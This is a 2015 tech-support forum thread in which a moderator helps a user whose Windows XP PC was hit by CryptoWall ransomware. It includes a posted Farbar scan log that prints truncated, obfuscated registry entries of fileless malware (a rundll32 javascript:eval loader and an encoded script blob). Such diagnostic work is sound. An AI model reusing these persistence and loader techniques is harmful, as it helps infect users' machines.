1. Computer problem? Tech Support Guy is completely free -- paid for by advertisers and donations. Click here to join today! If you're new to Tech Support Guy, we highly recommend that you visit our Guide for New Members.

Help decrypt_png

Discussion in 'Virus & Other Malware Removal' started by chron104, Mar 27, 2015.

Thread Status:
Not open for further replies.
Advertisement
  1. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Tech Support Guy System Info Utility version 1.0.0.2
    OS Version: Microsoft Windows XP Home Edition, Service Pack 3, 32 bit
    Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz, x86 Family 15 Model 2 Stepping 9
    Processor Count: 1
    RAM: 2559 Mb
    Graphics Card: NVIDIA GeForce FX 5200 (Microsoft Corporation), 512 Mb
    Hard Drives: C: Total - 953859 MB, Free - 588501 MB; D: Total - 114400 MB, Free - 114321 MB;
    Motherboard: Dell Computer Corp., 0U2424
    Antivirus: AVG update module, Updated: Yes, On-Demand Scanner: Enabled



    Hello everyone. I am new to this forum and am attempting to get help to repair my computer.
    Situation as of 2/2/15:


    My computer was infected with HELP_DECRIPT.PNG. Supposedly all cleared by McAfee but viral programs/code still exist on computer and my computer is not performing as it originally was prior to the infection. Infection occurred on about 1/25/15. Most of my document files and pictures located in my harddrive as well as my external harddrive were corrupted and encrypted by this virus. I deleted as much of the decrypt files i was able to find running a search term of "decrypt" and whatever came up i deleted them. I have downloaded Malwarebytes and AVG as well and the computer is still running slow and getting ACCESS DENIED ERROR MESSAGES, YOUR CURRENT SECURITY SETTINGS DO NOT ALLOW YOU TO DOWNLOAD THIS FILE (KEEP IN MIND THAT I HAVE ADMINISTRATOR PRIVILEGES), the exhaust fans in the computer are constantly running high non-stop, Mcafee is always finding trojans on a daily basis, asks for restart after virus detection but then virus detection shows up again. Especially for this one...."c:\windows\system32\windowspowershell\v1.0\powershell.exe" (TROJAN-POWELIKE) . I know I saw you guys resolve the same problem on your site for someone named "GROWLINGDOG" and you guys apparently fixed the problem. I do have some trust issues regarding downloading software from forums but, i have no choice right about now. Please help me get rid of this virus once and for all. I will definitely be grateful for your help. This has cost me huge in time, frustration, and effort as well as loss of all my pics. I don't know why MCafee did not show up in the SYSINFO. Thank you.
     
  2. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Hi and welcome. :)

    Unfortunately, we still unable to reverse the damages done by this virus. All your files, in all drives are encrypted, but there is no easy way to decrypt these files. You can read about this virus here:

    http://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#restore

    BleepingComputer.com has created a small utility that will find the Registry key created by CryptoWall and then export its list of encrypted files to a text file for you. This tool will also allow you to backup the encrypted files to another location in the event that you want to archive the encrypted files and reformat the machine. If you wish to generate a list of files that have been encrypted, you can download the ListCWall tool.

    There is an active CryptoWall support topic, which contains discussion and the experiences of a variety of IT consultants, end users, and companies who have been affected by CryptoWall. If you are interested in this infection or wish to ask questions about it, please visit the CryptoWall support topic. Once at the topic, and if you are a member, you can ask or answer questions and subscribe in order to get notifications when someone adds more information to the topic.

    http://www.bleepingcomputer.com/forums/t/532879/cryptowall-new-variant-of-cryptodefense/


    IDTool:

    [​IMG] Scan with IDTool

    Please download IDTool by Nathan and save the file to the desktop.
    It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
    • Enter the IDTool directory, right-click on [​IMG] icon and select [​IMG] Run as Administrator to start the tool.
    • IDTool needs Micorsoft .NET Framework environment to work properly, so if prompted to download & install it please agree.
    • Wait patiently until the cool will collect necessary data.
    • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
    • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
    • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
    Please include that in your next reply.

    Please download Farbar Recovery Scan Tool and save it to your desktop.

    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
    • Double-click to run it. When the tool opens click Yes to disclaimer.
    • Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
    • Press Scan button.
    • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
    • The tool will also produce another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.
     
  3. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Is there any reason why Mcafee is detecting the IDTOOL i just downloaded and extracted as a trojan ? It's being detected as an ARTEMIS...I may be a bit paranoid which i had indicated about downloads but, is this file safe ?
     
  4. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    It is the real deal. Turn off McAfee realtime protection while using the IDTool.
     
  5. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    ok. will do it now. Thanks for your response.
     
  6. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
  7. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    This is the report that was generated after running IDTOOLS !!!

    Infection Detection Tool v1.6 - Nathan Scott
    --------------------------------------------
    Date/Time: 3/28/2015 7:44:19 PM
    Operating System: Windows XP
    Service Pack: Service Pack 3
    Version Number: 5.1
    Product Type: Workstation
    --------------------------------------------
    [Detected Flags]
    1.| Possible CryptoWall Flag , HKCU\Software\E964BA5E9E6F7FF40E8BC453FA79D3AC\03345789AABCCDEF
     
  8. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    It is definitely Crytowall. You can list the files that have been encrypted running this tool
     
  9. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    these are the results of the FRST listed below...

    Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
    Ran by RAUL_104 (administrator) on RAUL-104 on 28-03-2015 19:50:54
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Loaded Profiles: RAUL_104 (Available profiles: RAUL_104 & RAUL_106 & AMY_106 & AMY_1061 & Administrator & Guest)
    Platform: Microsoft Windows XP Home Edition Service Pack 3 (X86) OS Language: English (United States)
    Internet Explorer Version 8 (Default browser: IE)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\AVG2015\avgrsx.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ABBYY) C:\Program Files\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Creative Technology Ltd) C:\WINDOWS\system32\CTSVCCDA.EXE
    () C:\WINDOWS\system32\spool\drivers\w32x86\3\dleaserv.exe
    ( ) C:\WINDOWS\system32\dleacoms.exe
    () C:\Program Files\Flip Video\FlipShare\FlipShareService.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
    (iolo technologies, LLC) C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
    (Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe
    (McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
    (iolo technologies, LLC) C:\Program Files\iolo\System Mechanic\LiveBoost.exe
    (CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
    (Creative Technology Ltd) C:\Program Files\Creative\SBAudigy2\Surround Mixer\CTSysVol.exe
    (Creative Technology Ltd) C:\WINDOWS\system32\CTHELPER.EXE
    (Memeo) C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe
    (CyberLink Corp.) C:\Program Files\Dell\Media Experience\PCMService.exe
    () C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
    (WDC) C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrUI.exe
    (Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
    () C:\Program Files\Dell V310-V510 Series\dleamon.exe
    () C:\Program Files\Dell V310-V510 Series\ezprint.exe
    () C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    (Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
    (McAfee, Inc.) C:\WINDOWS\system32\mfevtps.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Kies\KiesTrayAgent.exe
    () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
    (iolo technologies, LLC) C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
    () C:\Program Files\Common Files\LogiShrd\LQCVFX\COCIManager.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
    (Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
    () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
    (Prolific Technology Inc.) C:\Program Files\Nero\Nero BackItUp 4\IoctlSvc.exe
    (Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
    (Viewpoint Corporation) C:\Program Files\Viewpoint\Common\ViewpointService.exe
    (WDC) C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\system32\MsPMSPSv.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
    (GEMTEKS) C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WLService.exe
    (Linksys) C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WUSB54GC.exe
    (McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
    (Logitech Inc.) C:\Program Files\Logitech\Vid HD\Vid.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
    (Samsung) C:\Program Files\SAMSUNG\Kies\External\FirmwareUpdate\KiesPDLR.exe
    (Samsung Electronics) C:\Program Files\SAMSUNG\Kies\KiesAirMessage.exe
    (Dell) C:\Documents and Settings\RAUL_104\Local Settings\Apps\2.0\POD3HEHV.4EL\OAXDQMD5.Q3D\dell..tion_0f612f649c4a10af_0005.0006_f9e15713f5aac8ac\DellSystemDetect.exe
    (Microsoft Corporation) C:\Program Files\Messenger\msmsgs.exe
    (ArcSoft, Inc.) C:\Program Files\My Book\WD Backup\uBBMonitor.exe
    (WinZip Computing, S.L.) C:\Program Files\WinZip\WZQKPICK.EXE
    (BackWeb Technologies Inc. ) C:\DOCUME~1\RAUL_104\LOCALS~1\Temp\bwgo0003a7ab.exe
    (Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe
    (Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Microsoft Corporation) C:\WINDOWS\system32\windowspowershell\v1.0\powershell.exe
    (Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
    (NathanScott Apps) C:\Documents and Settings\RAUL_104\Local Settings\Application Data\IDTool\IDTool.exe


    ==================== Registry (Whitelisted) ==================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [124200 2007-09-17] (CyberLink Corp.)
    HKLM\...\Run: [CTSysVol] => C:\Program Files\Creative\SBAudigy2\Surround Mixer\CTSysVol.exe [49152 2002-10-29] (Creative Technology Ltd)
    HKLM\...\Run: [CTHelper] => C:\WINDOWS\system32\CTHELPER.EXE [28672 2003-02-20] (Creative Technology Ltd)
    HKLM\...\Run: [AsioReg] => "REGSVR32.EXE" /S CTASIO.DLL
    HKLM\...\Run: [UpdReg] => C:\WINDOWS\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
    HKLM\...\Run: [PCMService] => C:\Program Files\Dell\Media Experience\PCMService.exe [290816 2004-04-11] (CyberLink Corp.)
    HKLM\...\Run: [Share-to-Web Namespace Daemon] => C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe [69632 2002-04-17] (Hewlett-Packard)
    HKLM\...\Run: [WD Button Manager] => "WDBtnMgr.exe"
    HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [866584 2006-11-03] (Microsoft Corporation)
    HKLM\...\Run: [LogitechQuickCamRibbon] => C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe [2793304 2009-10-14] ()
    HKLM\...\Run: [WD Drive Manager] => C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrUI.exe [450560 2009-05-27] (WDC)
    HKLM\...\Run: [WD Anywhere Backup] => C:\Program Files\WD\WD Anywhere Backup\MemeoLauncher2.exe [197856 2009-04-17] (Memeo Inc.)
    HKLM\...\Run: [NBKeyScan] => C:\Program Files\Nero\Nero BackItUp 4\NBKeyScan.exe [2254120 2008-09-24] (Nero AG)
    HKLM\...\Run: [IntelliPoint] => C:\Program Files\Microsoft IntelliPoint\ipoint.exe [1468296 2009-05-26] (Microsoft Corporation)
    HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-05-27] (Advanced Micro Devices, Inc.)
    HKLM\...\Run: [dleamon.exe] => C:\Program Files\Dell V310-V510 Series\dleamon.exe [770728 2011-01-23] ()
    HKLM\...\Run: [EzPrint] => C:\Program Files\Dell V310-V510 Series\ezprint.exe [139944 2011-01-23] ()
    HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [47904 2010-12-14] (Apple Inc.)
    HKLM\...\Run: [DivXUpdate] => C:\Program Files\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-28] ()
    HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
    HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [600928 2010-06-01] (Sony Corporation)
    HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [151952 2012-11-29] (Apple Inc.)
    HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
    HKLM\...\Run: [KiesTrayAgent] => C:\Program Files\Samsung\Kies\KiesTrayAgent.exe [309688 2012-10-11] (Samsung Electronics Co., Ltd.)
    HKLM\...\Run: [ioloGovernor] => C:\Program Files\iolo\System Mechanic\ioloGovernor.exe [870224 2014-08-13] (iolo technologies, LLC)
    HKLM\...\Run: [Bonus.SSR.FR11] => C:\Program Files\ABBYY FineReader 11\Bonus.ScreenshotReader.exe [933640 2012-01-19] (ABBYY.)
    HKLM\...\Run: [ArcSoft Connection Service] => C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207424 2010-10-27] (ArcSoft Inc.)
    HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2012-10-25] (Apple Inc.)
    HKLM\...\Run: [UserFaultCheck] => %systemroot%\system32\dumprep 0 -u
    HKLM\...\Run: [atolpphm] => C:\WINDOWS\System32\atolpphm.exe
    HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3710416 2015-02-19] (AVG Technologies CZ, s.r.o.)
    Winlogon\Notify\AtiExtEvent: C:\WINDOWS\system32\Ati2evxx.dll (ATI Technologies Inc.)
    HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 224 more characters). <==== ATTENTION!
    HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^A4EAAA==n{[email protected]#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*[email protected]#@&S4k^+cne'[email protected]#@&`@#@&[email protected]#@&i @#@&di (the data entry has 32951 more characters). <==== ATTENTION!
    HKLM\...\Policies\Explorer: [NoCDBurning] 0
    HKLM\...\Policies\Explorer: [NoControlPanel] 0
    HKLM\...\Policies\Explorer: [NoFolderOptions] 0
    HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [Google Update] => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-21] (Google Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [SB Audigy 2 Startup Menu] => /L:ENG
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [AnyDVD] => C:\Program Files\SlySoft\AnyDVD\AnyDVDtray.exe [3193792 2009-12-11] (SlySoft, Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [Logitech Vid] => C:\Program Files\Logitech\Vid HD\Vid.exe [5915480 2010-10-29] (Logitech Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [] => C:\Program Files\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe [842680 2012-10-11] (Samsung)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [KiesPreload] => C:\Program Files\Samsung\Kies\Kies.exe [966072 2012-10-11] (Samsung)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [KiesAirMessage] => C:\Program Files\Samsung\Kies\KiesAirMessage.exe [580096 2012-10-09] (Samsung Electronics)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [DellSystemDetect] => C:\Documents and Settings\RAUL_104\Local Settings\Apps\2.0\POD3HEHV.4EL\OAXDQMD5.Q3D\dell..tion_0f612f649c4a10af_0005.0006_f9e15713f5aac8ac\DellSystemDetect.exe [258160 2014-04-05] (Dell)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [MSMSGS] => C:\Program Files\Messenger\msmsgs.exe [1695232 2008-04-13] (Microsoft Corporation)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [atolpphm] => C:\Documents and Settings\RAUL_104\atolpphm.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [msnmsgr] => C:\Program Files\MSN Messenger\msnmsgr.exe [6856704 2007-09-04] (Microsoft Corporation)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [AgentUpdate] => C:\WINDOWS\system32\regsvr32.exe /s "C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\S-1-5-21-3915684212-1830115506-383142685-1006\cert_v95_0.tpa"
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [CryptoUpdate] => C:\WINDOWS\system32\regsvr32.exe /s "C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\cert_v95_0.tpl"
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer\Run: [2096056239] => C:\DOCUME~1\RAUL_104\APPLIC~1\msitsxr.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [TaskbarNoNotification] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [NoFolderOptions] 0
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [NoControlPanel] 0
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {2ed4db3c-0410-11df-be50-00226ba62c8c} - H:\LaunchU3.exe -a
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {2ed4db3e-0410-11df-be50-00226ba62c8c} - G:\Setup_FlipShare.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {4f6dfe74-57ca-11de-bd66-00226ba62c8c} - I:\LaunchU3.exe -a
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {dffbf3f7-2974-11e2-949a-00226ba62c8c} - I:\setup.exe -a
    HKU\S-1-5-18\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
    HKU\S-1-5-18\...\Policies\Explorer: [NoFolderOptions] 0
    HKU\S-1-5-18\...\Policies\Explorer: [NoControlPanel] 0
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech Desktop Messenger.lnk
    ShortcutTarget: Logitech Desktop Messenger.lnk -> C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe (Logitech Inc.)
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WD Backup Monitor.lnk
    ShortcutTarget: WD Backup Monitor.lnk -> C:\Program Files\My Book\WD Backup\uBBMonitor.exe (ArcSoft, Inc.)
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
    ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
    Startup: C:\Documents and Settings\AMY_106\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    Startup: C:\Documents and Settings\AMY_1061\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    Startup: C:\Documents and Settings\RAUL_106\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2015\avgrsx.exe /sync /restart

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-515967899-117609710-839522115-1004\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-515967899-117609710-839522115-1004\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
    BHO: Dell Toolbar -> {09B71986-2AC5-482d-B6CB-42EA34F4F85B} -> C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
    BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll [2011-12-12] (DivX, LLC)
    BHO: No Name -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> No File
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-09-08] (Oracle Corporation)
    BHO: No Name -> {9CB65201-89C4-402c-BA80-02D8C59F9B1D} -> No File
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2013-10-09] (Skype Technologies S.A.)
    BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.10.11023.1534\swg.dll [2015-03-03] (Google Inc.)
    BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-09-08] (Oracle Corporation)
    BHO: No Name -> {FE063DB1-4EC0-403e-8DD8-394C54984B2C} -> No File
    Toolbar: HKLM - No Name - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - No File
    Toolbar: HKLM - Dell Toolbar - {09B71986-2AC5-482d-B6CB-42EA34F4F85B} - C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> No Name - {FE063DB9-4EC0-403E-8DD8-394C54984B2C} - No File
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> Dell Toolbar - {09B71986-2AC5-482D-B6CB-42EA34F4F85B} - C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
    DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
    DPF: {16F67783-7E72-4C39-99C4-4780A8335484} http://www.syncmyride.com/Own/Modules/UpdateCenter/applets/sync.cab
    DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/downl...-48D9-9B0E-1719D1177202/LegitCheckControl.cab
    DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
    DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: {E534E95D-4D69-4209-9DD0-D95BD20F9246} file:///F:/GxWebClient.cab
    DPF: {FC11A119-C2F7-46F4-9E32-937ABA26816E} file:///E:/CDVIEWER/CdViewer.cab
    Handler: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll [2011-05-28] (Logitech Inc.)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
